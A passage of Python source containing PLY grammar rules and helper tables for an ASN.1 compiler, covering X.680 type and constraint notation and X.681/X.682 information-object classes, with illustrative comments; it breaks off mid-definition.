def p_AlternativeTypeList_2 (t):
'AlternativeTypeList : AlternativeTypeList COMMA NamedType'
t[0] = t[1] + [t[3]]
# 28.10
def p_ChoiceValue_1 (t):
'''ChoiceValue : identifier COLON Value
| identifier COLON NullValue '''
val = t[3]
if not isinstance(val, Value):
val = Value(val=val)
t[0] = ChoiceValue (choice = t[1], val = val)
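# Illustrative example: the value notation "priority : 5" yields
# ChoiceValue(choice = 'priority', val = Value(val = '5')); plain tokens such
# as TRUE arrive as bare strings, so the isinstance() check above wraps them
# in a Value node to give downstream code a single type to handle.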
# 29 Notation for selection types
# 29.1
def p_SelectionType (t):
'SelectionType : identifier LT Type'
t[0] = SelectionType (typ = t[3], sel = t[1])
# 30 Notation for tagged types ------------------------------------------------
# 30.1
def p_TaggedType_1 (t):
'TaggedType : Tag Type'
t[1].mode = 'default'
t[0] = t[2]
t[0].AddTag(t[1])
def p_TaggedType_2 (t):
'''TaggedType : Tag IMPLICIT Type
| Tag EXPLICIT Type'''
t[1].mode = t[2]
t[0] = t[3]
t[0].AddTag(t[1])
def p_Tag (t):
'Tag : LBRACK Class ClassNumber RBRACK'
t[0] = Tag(cls = t[2], num = t[3])
def p_ClassNumber_1 (t):
'ClassNumber : number'
t[0] = t[1]
def p_ClassNumber_2 (t):
'ClassNumber : DefinedValue'
t[0] = t[1]
def p_Class_1 (t):
'''Class : UNIVERSAL
| APPLICATION
| PRIVATE'''
t[0] = t[1]
def p_Class_2 (t):
'Class :'
t[0] = 'CONTEXT'
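# Illustrative example: "[APPLICATION 3] IMPLICIT OCTET STRING" builds
# Tag(cls = 'APPLICATION', num = '3') with mode 'IMPLICIT', while a bare "[0]"
# falls through to the empty Class production above and gets cls = 'CONTEXT'.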
# 31 Notation for the object identifier type ----------------------------------
# 31.1
def p_ObjectIdentifierType (t):
'ObjectIdentifierType : OBJECT IDENTIFIER'
t[0] = ObjectIdentifierType()
# 31.3
def p_ObjectIdentifierValue (t):
'ObjectIdentifierValue : LBRACE oid_comp_list RBRACE'
t[0] = ObjectIdentifierValue (comp_list=t[2])
def p_oid_comp_list_1 (t):
'oid_comp_list : oid_comp_list ObjIdComponents'
t[0] = t[1] + [t[2]]
def p_oid_comp_list_2 (t):
'oid_comp_list : ObjIdComponents'
t[0] = [t[1]]
def p_ObjIdComponents (t):
'''ObjIdComponents : NameForm
| NumberForm
| NameAndNumberForm'''
t[0] = t[1]
def p_NameForm (t):
'''NameForm : LCASE_IDENT
| LCASE_IDENT_ASSIGNED'''
t [0] = t[1]
def p_NumberForm (t):
'''NumberForm : NUMBER'''
# | DefinedValue'''
t [0] = t[1]
def p_NameAndNumberForm (t):
'''NameAndNumberForm : LCASE_IDENT_ASSIGNED LPAREN NumberForm RPAREN
| LCASE_IDENT LPAREN NumberForm RPAREN'''
t[0] = Node('name_and_number', ident = t[1], number = t[3])
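# Illustrative example: "{ iso(1) standard(0) 8571 }" yields comp_list =
#   [Node('name_and_number', ident = 'iso', number = '1'),
#    Node('name_and_number', ident = 'standard', number = '0'),
#    '8571']
# mixing NameAndNumberForm nodes with a bare NumberForm.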
# 32 Notation for the relative object identifier type -------------------------
# 32.1
def p_RelativeOIDType (t):
'RelativeOIDType : RELATIVE_OID'
t[0] = RelativeOIDType()
# 33 Notation for the embedded-pdv type ---------------------------------------
# 33.1
def p_EmbeddedPDVType (t):
'EmbeddedPDVType : EMBEDDED PDV'
t[0] = EmbeddedPDVType()
# 34 Notation for the external type -------------------------------------------
# 34.1
def p_ExternalType (t):
'ExternalType : EXTERNAL'
t[0] = ExternalType()
# 36 Notation for character string types --------------------------------------
# 36.1
def p_CharacterStringType (t):
'''CharacterStringType : RestrictedCharacterStringType
| UnrestrictedCharacterStringType'''
t[0] = t[1]
# 37 Definition of restricted character string types --------------------------
def p_RestrictedCharacterStringType_1 (t):
'RestrictedCharacterStringType : BMPString'
t[0] = BMPStringType ()
def p_RestrictedCharacterStringType_2 (t):
'RestrictedCharacterStringType : GeneralString'
t[0] = GeneralStringType ()
def p_RestrictedCharacterStringType_3 (t):
'RestrictedCharacterStringType : GraphicString'
t[0] = GraphicStringType ()
def p_RestrictedCharacterStringType_4 (t):
'RestrictedCharacterStringType : IA5String'
t[0] = IA5StringType ()
def p_RestrictedCharacterStringType_5 (t):
'RestrictedCharacterStringType : ISO646String'
t[0] = ISO646StringType ()
def p_RestrictedCharacterStringType_6 (t):
'RestrictedCharacterStringType : NumericString'
t[0] = NumericStringType ()
def p_RestrictedCharacterStringType_7 (t):
'RestrictedCharacterStringType : PrintableString'
t[0] = PrintableStringType ()
def p_RestrictedCharacterStringType_8 (t):
'RestrictedCharacterStringType : TeletexString'
t[0] = TeletexStringType ()
def p_RestrictedCharacterStringType_9 (t):
'RestrictedCharacterStringType : T61String'
t[0] = T61StringType ()
def p_RestrictedCharacterStringType_10 (t):
'RestrictedCharacterStringType : UniversalString'
t[0] = UniversalStringType ()
def p_RestrictedCharacterStringType_11 (t):
'RestrictedCharacterStringType : UTF8String'
t[0] = UTF8StringType ()
def p_RestrictedCharacterStringType_12 (t):
'RestrictedCharacterStringType : VideotexString'
t[0] = VideotexStringType ()
def p_RestrictedCharacterStringType_13 (t):
'RestrictedCharacterStringType : VisibleString'
t[0] = VisibleStringType ()
# 40 Definition of unrestricted character string types ------------------------
# 40.1
def p_UnrestrictedCharacterStringType (t):
'UnrestrictedCharacterStringType : CHARACTER STRING'
t[0] = UnrestrictedCharacterStringType ()
# 41 Notation for types defined in clauses 42 to 44 ---------------------------
# 42 Generalized time ---------------------------------------------------------
def p_UsefulType_1 (t):
'UsefulType : GeneralizedTime'
t[0] = GeneralizedTime()
# 43 Universal time -----------------------------------------------------------
def p_UsefulType_2 (t):
'UsefulType : UTCTime'
t[0] = UTCTime()
# 44 The object descriptor type -----------------------------------------------
def p_UsefulType_3 (t):
'UsefulType : ObjectDescriptor'
t[0] = ObjectDescriptor()
# 45 Constrained types --------------------------------------------------------
# 45.1
def p_ConstrainedType_1 (t):
'ConstrainedType : Type Constraint'
t[0] = t[1]
t[0].AddConstraint(t[2])
def p_ConstrainedType_2 (t):
'ConstrainedType : TypeWithConstraint'
t[0] = t[1]
# 45.5
def p_TypeWithConstraint_1 (t):
'''TypeWithConstraint : SET Constraint OF Type
| SET SizeConstraint OF Type'''
t[0] = SetOfType (val = t[4], constr = t[2])
def p_TypeWithConstraint_2 (t):
'''TypeWithConstraint : SEQUENCE Constraint OF Type
| SEQUENCE SizeConstraint OF Type'''
t[0] = SequenceOfType (val = t[4], constr = t[2])
def p_TypeWithConstraint_3 (t):
'''TypeWithConstraint : SET Constraint OF NamedType
| SET SizeConstraint OF NamedType'''
t[0] = SetOfType (val = t[4], constr = t[2])
def p_TypeWithConstraint_4 (t):
'''TypeWithConstraint : SEQUENCE Constraint OF NamedType
| SEQUENCE SizeConstraint OF NamedType'''
t[0] = SequenceOfType (val = t[4], constr = t[2])
# 45.6
# 45.7
def p_Constraint (t):
'Constraint : LPAREN ConstraintSpec ExceptionSpec RPAREN'
t[0] = t[2]
def p_ConstraintSpec (t):
'''ConstraintSpec : ElementSetSpecs
| GeneralConstraint'''
t[0] = t[1]
# 46 Element set specification ------------------------------------------------
# 46.1
def p_ElementSetSpecs_1 (t):
'ElementSetSpecs : RootElementSetSpec'
t[0] = t[1]
def p_ElementSetSpecs_2 (t):
'ElementSetSpecs : RootElementSetSpec COMMA ELLIPSIS'
t[0] = t[1]
t[0].ext = True
def p_ElementSetSpecs_3 (t):
'ElementSetSpecs : RootElementSetSpec COMMA ELLIPSIS COMMA AdditionalElementSetSpec'
t[0] = t[1]
t[0].ext = True
def p_RootElementSetSpec (t):
'RootElementSetSpec : ElementSetSpec'
t[0] = t[1]
def p_AdditionalElementSetSpec (t):
'AdditionalElementSetSpec : ElementSetSpec'
t[0] = t[1]
def p_ElementSetSpec (t):
'ElementSetSpec : Unions'
t[0] = t[1]
def p_Unions_1 (t):
'Unions : Intersections'
t[0] = t[1]
def p_Unions_2 (t):
'Unions : UElems UnionMark Intersections'
t[0] = Constraint(type = 'Union', subtype = [t[1], t[3]])
def p_UElems (t):
'UElems : Unions'
t[0] = t[1]
def p_Intersections_1 (t):
'Intersections : IntersectionElements'
t[0] = t[1]
def p_Intersections_2 (t):
'Intersections : IElems IntersectionMark IntersectionElements'
t[0] = Constraint(type = 'Intersection', subtype = [t[1], t[3]])
def p_IElems (t):
'IElems : Intersections'
t[0] = t[1]
def p_IntersectionElements (t):
'IntersectionElements : Elements'
t[0] = t[1]
def p_UnionMark (t):
'''UnionMark : BAR
| UNION'''
def p_IntersectionMark (t):
'''IntersectionMark : CIRCUMFLEX
| INTERSECTION'''
# 46.5
def p_Elements_1 (t):
'Elements : SubtypeElements'
t[0] = t[1]
def p_Elements_2 (t):
'Elements : LPAREN ElementSetSpec RPAREN'
t[0] = t[2]
# 47 Subtype elements ---------------------------------------------------------
# 47.1 General
def p_SubtypeElements (t):
'''SubtypeElements : SingleValue
| ContainedSubtype
| ValueRange
| PermittedAlphabet
| SizeConstraint
| TypeConstraint
| InnerTypeConstraints
| PatternConstraint'''
t[0] = t[1]
# 47.2 Single value
# 47.2.1
def p_SingleValue (t):
'SingleValue : Value'
t[0] = Constraint(type = 'SingleValue', subtype = t[1])
# 47.3 Contained subtype
# 47.3.1
def p_ContainedSubtype (t):
'ContainedSubtype : Includes Type'
t[0] = Constraint(type = 'ContainedSubtype', subtype = t[2])
def p_Includes (t):
'''Includes : INCLUDES
| '''
# 47.4 Value range
# 47.4.1
def p_ValueRange (t):
'ValueRange : LowerEndpoint RANGE UpperEndpoint'
t[0] = Constraint(type = 'ValueRange', subtype = [t[1], t[3]])
# 47.4.3
def p_LowerEndpoint_1 (t):
'LowerEndpoint : LowerEndValue'
t[0] = t[1]
def p_LowerEndpoint_2 (t):
'LowerEndpoint : LowerEndValue LT'
    t[0] = t[1] # exclusive ("<") endpoint; the openness of the range is not preserved
def p_UpperEndpoint_1 (t):
'UpperEndpoint : UpperEndValue'
t[0] = t[1]
def p_UpperEndpoint_2 (t):
'UpperEndpoint : LT UpperEndValue'
    t[0] = t[1] # exclusive ("<") endpoint; the openness of the range is not preserved
# 47.4.4
def p_LowerEndValue (t):
'''LowerEndValue : Value
| MIN'''
t[0] = t[1] # XXX
def p_UpperEndValue (t):
'''UpperEndValue : Value
| MAX'''
t[0] = t[1]
# 47.5 Size constraint
# 47.5.1
def p_SizeConstraint (t):
'SizeConstraint : SIZE Constraint'
t[0] = Constraint (type = 'Size', subtype = t[2])
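# Illustrative example: "OCTET STRING (SIZE (1..32))" nests the constraints
# roughly as
#   Constraint(type = 'Size',
#              subtype = Constraint(type = 'ValueRange', subtype = ['1', '32']))
# while a plain "INTEGER (0..255)" gives just the inner ValueRange constraint.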
# 47.6 Type constraint
# 47.6.1
def p_TypeConstraint (t):
'TypeConstraint : Type'
t[0] = Constraint (type = 'Type', subtype = t[1])
# 47.7 Permitted alphabet
# 47.7.1
def p_PermittedAlphabet (t):
'PermittedAlphabet : FROM Constraint'
t[0] = Constraint (type = 'From', subtype = t[2])
# 47.8 Inner subtyping
# 47.8.1
def p_InnerTypeConstraints (t):
'''InnerTypeConstraints : WITH COMPONENT SingleTypeConstraint
| WITH COMPONENTS MultipleTypeConstraints'''
pass # ignore PER invisible constraint
# 47.8.3
def p_SingleTypeConstraint (t):
'SingleTypeConstraint : Constraint'
t[0] = t[1]
# 47.8.4
def p_MultipleTypeConstraints (t):
'''MultipleTypeConstraints : FullSpecification
| PartialSpecification'''
t[0] = t[1]
def p_FullSpecification (t):
'FullSpecification : LBRACE TypeConstraints RBRACE'
t[0] = t[2]
def p_PartialSpecification (t):
'PartialSpecification : LBRACE ELLIPSIS COMMA TypeConstraints RBRACE'
t[0] = t[4]
def p_TypeConstraints_1 (t):
'TypeConstraints : named_constraint'
t [0] = [t[1]]
def p_TypeConstraints_2 (t):
'TypeConstraints : TypeConstraints COMMA named_constraint'
t[0] = t[1] + [t[3]]
def p_named_constraint_1 (t):
    'named_constraint : identifier constraint'
    # PLY ignores return values of p_ functions; the result must go into t[0]
    t[0] = Node ('named_constraint', ident = t[1], constr = t[2])
def p_named_constraint_2 (t):
    'named_constraint : constraint'
    t[0] = Node ('named_constraint', constr = t[1])
def p_constraint (t):
'constraint : value_constraint presence_constraint'
t[0] = Node ('constraint', value = t[1], presence = t[2])
def p_value_constraint_1 (t):
'value_constraint : Constraint'
t[0] = t[1]
def p_value_constraint_2 (t):
'value_constraint : '
pass
def p_presence_constraint_1 (t):
'''presence_constraint : PRESENT
| ABSENT
| OPTIONAL'''
t[0] = t[1]
def p_presence_constraint_2 (t):
'''presence_constraint : '''
pass
# 47.9 Pattern constraint
# 47.9.1
def p_PatternConstraint (t):
'PatternConstraint : PATTERN Value'
t[0] = Constraint (type = 'Pattern', subtype = t[2])
# 49 The exception identifier
# 49.4
def p_ExceptionSpec_1 (t):
'ExceptionSpec : EXCLAMATION ExceptionIdentification'
pass
def p_ExceptionSpec_2 (t):
'ExceptionSpec : '
pass
def p_ExceptionIdentification (t):
'''ExceptionIdentification : SignedNumber
| DefinedValue
| Type COLON Value '''
pass
# /*-----------------------------------------------------------------------*/
# /* Value Notation Productions */
# /*-----------------------------------------------------------------------*/
def p_binary_string (t):
'binary_string : BSTRING'
t[0] = BStringValue(val = t[1])
def p_hex_string (t):
'hex_string : HSTRING'
t[0] = HStringValue(val = t[1])
def p_char_string (t):
'char_string : QSTRING'
t[0] = t[1]
def p_number (t):
'number : NUMBER'
t[0] = t[1]
#--- ITU-T Recommendation X.208 -----------------------------------------------
# 27 Notation for the any type ------------------------------------------------
# 27.1
def p_AnyType (t):
'''AnyType : ANY
| ANY DEFINED BY identifier'''
t[0] = AnyType()
#--- ITU-T Recommendation X.681 -----------------------------------------------
# 7 ASN.1 lexical items -------------------------------------------------------
# 7.1 Information object class references
def p_objectclassreference (t):
'objectclassreference : CLASS_IDENT'
t[0] = Class_Ref(val=t[1])
# 7.2 Information object references
def p_objectreference (t):
'objectreference : LCASE_IDENT'
t[0] = t[1]
# 7.3 Information object set references
#def p_objectsetreference (t):
# 'objectsetreference : UCASE_IDENT'
# t[0] = t[1]
# 7.4 Type field references
# ucasefieldreference
# 7.5 Value field references
# lcasefieldreference
# 7.6 Value set field references
# ucasefieldreference
# 7.7 Object field references
# lcasefieldreference
# 7.8 Object set field references
# ucasefieldreference
def p_ucasefieldreference (t):
'ucasefieldreference : AMPERSAND UCASE_IDENT'
t[0] = '&' + t[2]
def p_lcasefieldreference (t):
'lcasefieldreference : AMPERSAND LCASE_IDENT'
t[0] = '&' + t[2]
# 8 Referencing definitions
# 8.1
def p_DefinedObjectClass (t):
'''DefinedObjectClass : objectclassreference
| UsefulObjectClassReference'''
t[0] = t[1]
global obj_class
obj_class = t[0].val
def p_DefinedObject (t):
'''DefinedObject : objectreference'''
t[0] = t[1]
# 8.4
def p_UsefulObjectClassReference (t):
'''UsefulObjectClassReference : TYPE_IDENTIFIER
| ABSTRACT_SYNTAX'''
t[0] = Class_Ref(val=t[1])
# 9 Information object class definition and assignment
# 9.1
def p_ObjectClassAssignment (t):
'''ObjectClassAssignment : CLASS_IDENT ASSIGNMENT ObjectClass
| UCASE_IDENT ASSIGNMENT ObjectClass'''
t[0] = t[3]
t[0].SetName(t[1])
if isinstance(t[0], ObjectClassDefn):
t[0].reg_types()
# 9.2
def p_ObjectClass (t):
'''ObjectClass : DefinedObjectClass
| ObjectClassDefn
| ParameterizedObjectClass '''
t[0] = t[1]
# 9.3
def p_ObjectClassDefn (t):
'''ObjectClassDefn : CLASS LBRACE FieldSpecs RBRACE
| CLASS LBRACE FieldSpecs RBRACE WithSyntaxSpec'''
t[0] = ObjectClassDefn(fields = t[3])
def p_FieldSpecs_1 (t):
'FieldSpecs : FieldSpec'
t[0] = [t[1]]
def p_FieldSpecs_2 (t):
'FieldSpecs : FieldSpecs COMMA FieldSpec'
t[0] = t[1] + [t[3]]
def p_WithSyntaxSpec (t):
'WithSyntaxSpec : WITH SYNTAX lbraceignore rbraceignore'
t[0] = None
# 9.4
def p_FieldSpec (t):
'''FieldSpec : TypeFieldSpec
| FixedTypeValueFieldSpec
| VariableTypeValueFieldSpec
| FixedTypeValueSetFieldSpec
| ObjectFieldSpec
| ObjectSetFieldSpec '''
t[0] = t[1]
# 9.5
def p_TypeFieldSpec (t):
'''TypeFieldSpec : ucasefieldreference
| ucasefieldreference TypeOptionalitySpec '''
t[0] = TypeFieldSpec()
t[0].SetName(t[1])
def p_TypeOptionalitySpec_1 (t):
'TypeOptionalitySpec ::= OPTIONAL'
pass
def p_TypeOptionalitySpec_2 (t):
'TypeOptionalitySpec ::= DEFAULT Type'
pass
# 9.6
def p_FixedTypeValueFieldSpec (t):
'''FixedTypeValueFieldSpec : lcasefieldreference Type
| lcasefieldreference Type UNIQUE
| lcasefieldreference Type ValueOptionalitySpec
| lcasefieldreference Type UNIQUE ValueOptionalitySpec '''
t[0] = FixedTypeValueFieldSpec(typ = t[2])
t[0].SetName(t[1])
def p_ValueOptionalitySpec_1 (t):
'ValueOptionalitySpec ::= OPTIONAL'
pass
def p_ValueOptionalitySpec_2 (t):
'ValueOptionalitySpec ::= DEFAULT Value'
pass
# 9.8
def p_VariableTypeValueFieldSpec (t):
'''VariableTypeValueFieldSpec : lcasefieldreference FieldName
| lcasefieldreference FieldName ValueOptionalitySpec '''
t[0] = VariableTypeValueFieldSpec()
t[0].SetName(t[1])
# 9.9
def p_FixedTypeValueSetFieldSpec (t):
'''FixedTypeValueSetFieldSpec : ucasefieldreference Type
| ucasefieldreference Type ValueSetOptionalitySpec '''
t[0] = FixedTypeValueSetFieldSpec()
t[0].SetName(t[1])
def p_ValueSetOptionalitySpec_1 (t):
'ValueSetOptionalitySpec ::= OPTIONAL'
pass
def p_ValueSetOptionalitySpec_2 (t):
'ValueSetOptionalitySpec ::= DEFAULT ValueSet'
pass
# 9.11
def p_ObjectFieldSpec (t):
'''ObjectFieldSpec : lcasefieldreference DefinedObjectClass
| lcasefieldreference DefinedObjectClass ObjectOptionalitySpec '''
t[0] = ObjectFieldSpec(cls=t[2])
t[0].SetName(t[1])
global obj_class
obj_class = None
def p_ObjectOptionalitySpec_1 (t):
'ObjectOptionalitySpec ::= OPTIONAL'
pass
def p_ObjectOptionalitySpec_2 (t):
'ObjectOptionalitySpec ::= DEFAULT Object'
pass
# 9.12
def p_ObjectSetFieldSpec (t):
'''ObjectSetFieldSpec : ucasefieldreference DefinedObjectClass
| ucasefieldreference DefinedObjectClass ObjectSetOptionalitySpec '''
t[0] = ObjectSetFieldSpec(cls=t[2])
t[0].SetName(t[1])
def p_ObjectSetOptionalitySpec_1 (t):
'ObjectSetOptionalitySpec ::= OPTIONAL'
pass
def p_ObjectSetOptionalitySpec_2 (t):
'ObjectSetOptionalitySpec ::= DEFAULT ObjectSet'
pass
# 9.13
def p_PrimitiveFieldName (t):
'''PrimitiveFieldName : ucasefieldreference
| lcasefieldreference '''
t[0] = t[1]
# 9.13
def p_FieldName_1 (t):
'FieldName : PrimitiveFieldName'
t[0] = t[1]
def p_FieldName_2 (t):
'FieldName : FieldName DOT PrimitiveFieldName'
t[0] = t[1] + '.' + t[3]
# 11 Information object definition and assignment
# 11.1
def p_ObjectAssignment (t):
'ObjectAssignment : objectreference DefinedObjectClass ASSIGNMENT Object'
t[0] = ObjectAssignment (ident = t[1], cls=t[2].val, val=t[4])
global obj_class
obj_class = None
# 11.3
def p_Object (t):
'''Object : DefinedObject
| ObjectDefn
| ParameterizedObject'''
t[0] = t[1]
# 11.4
def p_ObjectDefn (t):
'ObjectDefn : lbraceobject bodyobject rbraceobject'
t[0] = t[2]
# {...} block of object definition
def p_lbraceobject(t):
'lbraceobject : braceobjectbegin LBRACE'
t[0] = t[1]
def p_braceobjectbegin(t):
'braceobjectbegin : '
global lexer
global obj_class
if set_class_syntax(obj_class):
state = 'INITIAL'
else:
lexer.level = 1
state = 'braceignore'
lexer.push_state(state)
def p_rbraceobject(t):
'rbraceobject : braceobjectend RBRACE'
t[0] = t[2]
def p_braceobjectend(t):
'braceobjectend : '
global lexer
lexer.pop_state()
set_class_syntax(None)
def p_bodyobject_1 (t):
'bodyobject : '
t[0] = { }
def p_bodyobject_2 (t):
'bodyobject : cls_syntax_list'
t[0] = t[1]
def p_cls_syntax_list_1 (t):
'cls_syntax_list : cls_syntax_list cls_syntax'
t[0] = t[1]
t[0].update(t[2])
def p_cls_syntax_list_2 (t):
'cls_syntax_list : cls_syntax'
t[0] = t[1]
# X.681
def p_cls_syntax_1 (t):
'cls_syntax : Type IDENTIFIED BY Value'
t[0] = { get_class_fieled(' ') : t[1], get_class_fieled(' '.join((t[2], t[3]))) : t[4] }
def p_cls_syntax_2 (t):
'cls_syntax : HAS PROPERTY Value'
t[0] = { get_class_fieled(' '.join(t[1:-1])) : t[-1:][0] }
# X.880
def p_cls_syntax_3 (t):
'''cls_syntax : ERRORS ObjectSet
| LINKED ObjectSet
| RETURN RESULT BooleanValue
| SYNCHRONOUS BooleanValue
| INVOKE PRIORITY Value
| RESULT_PRIORITY Value
| PRIORITY Value
| ALWAYS RESPONDS BooleanValue
| IDEMPOTENT BooleanValue '''
t[0] = { get_class_fieled(' '.join(t[1:-1])) : t[-1:][0] }
def p_cls_syntax_4 (t):
'''cls_syntax : ARGUMENT Type
| RESULT Type
| PARAMETER Type '''
t[0] = { get_class_fieled(t[1]) : t[2] }
def p_cls_syntax_5 (t):
'cls_syntax : CODE Value'
    fld = get_class_fieled(t[1])
t[0] = { fld : t[2] }
if isinstance(t[2], ChoiceValue):
fldt = fld + '.' + t[2].choice
t[0][fldt] = t[2]
def p_cls_syntax_6 (t):
'''cls_syntax : ARGUMENT Type OPTIONAL BooleanValue
| RESULT Type OPTIONAL BooleanValue
| PARAMETER Type OPTIONAL BooleanValue '''
t[0] = { get_class_fieled(t[1]) : t[2], get_class_fieled(' '.join((t[1], t[3]))) : t[4] }
# 12 Information object set definition and assignment
# 12.1
def p_ObjectSetAssignment (t):
'ObjectSetAssignment : UCASE_IDENT CLASS_IDENT ASSIGNMENT ObjectSet'
t[0] = Node('ObjectSetAssignment', name=t[1], cls=t[2], val=t[4])
# 12.3
def p_ObjectSet (t):
'ObjectSet : lbraceignore rbraceignore'
t[0] = None
# 14 Notation for the object class field type ---------------------------------
# 14.1
def p_ObjectClassFieldType (t):
'ObjectClassFieldType : DefinedObjectClass DOT FieldName'
t[0] = get_type_from_class(t[1], t[3])
# 14.6
def p_ObjectClassFieldValue (t):
'''ObjectClassFieldValue : OpenTypeFieldVal'''
t[0] = t[1]
def p_OpenTypeFieldVal (t):
'''OpenTypeFieldVal : Type COLON Value
| NullType COLON NullValue'''
t[0] = t[3]
# 15 Information from objects -------------------------------------------------
# 15.1
def p_ValueFromObject (t):
'ValueFromObject : LCASE_IDENT DOT FieldName'
t[0] = t[1] + '.' + t[3]
# Annex C - The instance-of type ----------------------------------------------
# C.2
def p_InstanceOfType (t):
'InstanceOfType : INSTANCE OF DefinedObjectClass'
t[0] = InstanceOfType()
# --- tables ---
useful_object_class_types = {
# Annex A
'TYPE-IDENTIFIER.&id' : lambda : ObjectIdentifierType(),
'TYPE-IDENTIFIER.&Type' : lambda : OpenType(),
# Annex B
'ABSTRACT-SYNTAX.&id' : lambda : ObjectIdentifierType(),
'ABSTRACT-SYNTAX.&Type' : lambda : OpenType(),
'ABSTRACT-SYNTAX.&property' : lambda : BitStringType(),
}
object_class_types = { }
object_class_typerefs = { }
object_class_classrefs = { }
# dummy types
class _VariableTypeValueFieldSpec (AnyType):
pass
class _FixedTypeValueSetFieldSpec (AnyType):
pass
class_types_creator = {
'BooleanType' : lambda : BooleanType(),
'IntegerType' : lambda : IntegerType(),
'ObjectIdentifierType' : lambda : ObjectIdentifierType(),
'OpenType' : lambda : OpenType(),
# dummy types
'_VariableTypeValueFieldSpec' : lambda : _VariableTypeValueFieldSpec(),
'_FixedTypeValueSetFieldSpec' : lambda : _FixedTypeValueSetFieldSpec(),
}
class_names = { }
x681_syntaxes = {
'TYPE-IDENTIFIER' : {
' ' : '&Type',
'IDENTIFIED' : 'IDENTIFIED',
#'BY' : 'BY',
'IDENTIFIED BY' : '&id',
},
'ABSTRACT-SYNTAX' : {
' ' : '&Type',
'IDENTIFIED' : 'IDENTIFIED',
#'BY' : 'BY',
'IDENTIFIED BY' : '&id',
'HAS' : 'HAS',
'PROPERTY' : 'PROPERTY',
'HAS PROPERTY' : '&property',
},
}
class_syntaxes_enabled = {
'TYPE-IDENTIFIER' : True,
'ABSTRACT-SYNTAX' : True,
}
class_syntaxes = {
'TYPE-IDENTIFIER' : x681_syntaxes['TYPE-IDENTIFIER'],
'ABSTRACT-SYNTAX' : x681_syntaxes['ABSTRACT-SYNTAX'],
}
class_current_syntax = None
def get_syntax_tokens(syntaxes):
tokens = { }
for s in (syntaxes):
for k in (list(syntaxes[s].keys())):
if k.find(' ') < 0:
tokens[k] = k
tokens[k] = tokens[k].replace('-', '_')
return list(tokens.values())
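# Illustrative example: applied to x681_syntaxes above, only the single-word
# keywords survive the k.find(' ') filter, giving ['IDENTIFIED', 'HAS', 'PROPERTY'];
# dashes are mapped to underscores (as for 'RESULT-PRIORITY' in the X.880
# tables further down, which becomes the token RESULT_PRIORITY).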
tokens = tokens + get_syntax_tokens(x681_syntaxes)
def set_class_syntax(syntax):
global class_syntaxes_enabled
global class_current_syntax
#print "set_class_syntax", syntax, class_current_syntax
if class_syntaxes_enabled.get(syntax, False):
class_current_syntax = syntax
return True
else:
class_current_syntax = None
return False
def is_class_syntax(name):
global class_syntaxes
global class_current_syntax
#print "is_class_syntax", name, class_current_syntax
if not class_current_syntax:
return False
return name in class_syntaxes[class_current_syntax]
def get_class_fieled(name):
if not class_current_syntax:
return None
return class_syntaxes[class_current_syntax][name]
def is_class_ident(name):
return name in class_names
def add_class_ident(name):
#print "add_class_ident", name
class_names[name] = name
def get_type_from_class(cls, fld):
flds = fld.split('.')
if (isinstance(cls, Class_Ref)):
key = cls.val + '.' + flds[0]
else:
key = cls + '.' + flds[0]
if key in object_class_classrefs:
return get_type_from_class(object_class_classrefs[key], '.'.join(flds[1:]))
if key in object_class_typerefs:
return Type_Ref(val=object_class_typerefs[key])
creator = lambda : AnyType()
creator = useful_object_class_types.get(key, creator)
creator = object_class_types.get(key, creator)
return creator()
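# Illustrative example (assuming the X.880 OPERATION class has been imported):
#   get_type_from_class(Class_Ref(val = 'OPERATION'), '&operationCode')
# finds 'OPERATION.&operationCode' in object_class_typerefs and returns
# Type_Ref(val = 'Code'); an unknown field falls back to AnyType().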
def set_type_to_class(cls, fld, pars):
#print "set_type_to_class", cls, fld, pars
key = cls + '.' + fld
typename = 'OpenType'
if (len(pars) > 0):
typename = pars[0]
else:
pars.append(typename)
typeref = None
if (len(pars) > 1):
if (isinstance(pars[1], Class_Ref)):
pars[1] = pars[1].val
typeref = pars[1]
msg = None
if key in object_class_types:
msg = object_class_types[key]().type
if key in object_class_typerefs:
msg = "TypeReference " + object_class_typerefs[key]
if key in object_class_classrefs:
msg = "ClassReference " + object_class_classrefs[key]
if msg == ' '.join(pars):
msg = None
if msg:
msg0 = "Can not define CLASS field %s as '%s'\n" % (key, ' '.join(pars))
msg1 = "Already defined as '%s'" % (msg)
raise CompError(msg0 + msg1)
if (typename == 'ClassReference'):
if not typeref: return False
object_class_classrefs[key] = typeref
return True
if (typename == 'TypeReference'):
if not typeref: return False
object_class_typerefs[key] = typeref
return True
creator = class_types_creator.get(typename)
if creator:
object_class_types[key] = creator
return True
else:
return False
def import_class_from_module(mod, cls):
add_class_ident(cls)
mcls = "$%s$%s" % (mod, cls)
for k in list(object_class_classrefs.keys()):
kk = k.split('.', 1)
if kk[0] == mcls:
object_class_classrefs[cls + '.' + kk[0]] = object_class_classrefs[k]
for k in list(object_class_typerefs.keys()):
kk = k.split('.', 1)
if kk[0] == mcls:
object_class_typerefs[cls + '.' + kk[0]] = object_class_typerefs[k]
for k in list(object_class_types.keys()):
kk = k.split('.', 1)
if kk[0] == mcls:
object_class_types[cls + '.' + kk[0]] = object_class_types[k]
#--- ITU-T Recommendation X.682 -----------------------------------------------
# 8 General constraint specification ------------------------------------------
# 8.1
def p_GeneralConstraint (t):
'''GeneralConstraint : UserDefinedConstraint
| TableConstraint
| ContentsConstraint'''
t[0] = t[1]
# 9 User-defined constraints --------------------------------------------------
# 9.1
def p_UserDefinedConstraint (t):
'UserDefinedConstraint : CONSTRAINED BY LBRACE UserDefinedConstraintParameterList RBRACE'
t[0] = Constraint(type = 'UserDefined', subtype = t[4])
def p_UserDefinedConstraintParameterList_1 (t):
'UserDefinedConstraintParameterList : '
t[0] = []
def p_UserDefinedConstraintParameterList_2 (t):
'UserDefinedConstraintParameterList : UserDefinedConstraintParameter'
t[0] = [t[1]]
def p_UserDefinedConstraintParameterList_3 (t):
'UserDefinedConstraintParameterList : UserDefinedConstraintParameterList COMMA UserDefinedConstraintParameter'
t[0] = t[1] + [t[3]]
# 9.3
def p_UserDefinedConstraintParameter (t):
'UserDefinedConstraintParameter : Type'
t[0] = t[1]
# 10 Table constraints, including component relation constraints --------------
# 10.3
def p_TableConstraint (t):
'''TableConstraint : SimpleTableConstraint
| ComponentRelationConstraint'''
t[0] = Constraint(type = 'Table', subtype = t[1])
def p_SimpleTableConstraint (t):
'SimpleTableConstraint : LBRACE UCASE_IDENT RBRACE'
t[0] = t[2]
# 10.7
def p_ComponentRelationConstraint (t):
'ComponentRelationConstraint : LBRACE UCASE_IDENT RBRACE LBRACE AtNotations RBRACE'
t[0] = t[2] + str(t[5])
def p_AtNotations_1 (t):
'AtNotations : AtNotation'
t[0] = [t[1]]
def p_AtNotations_2 (t):
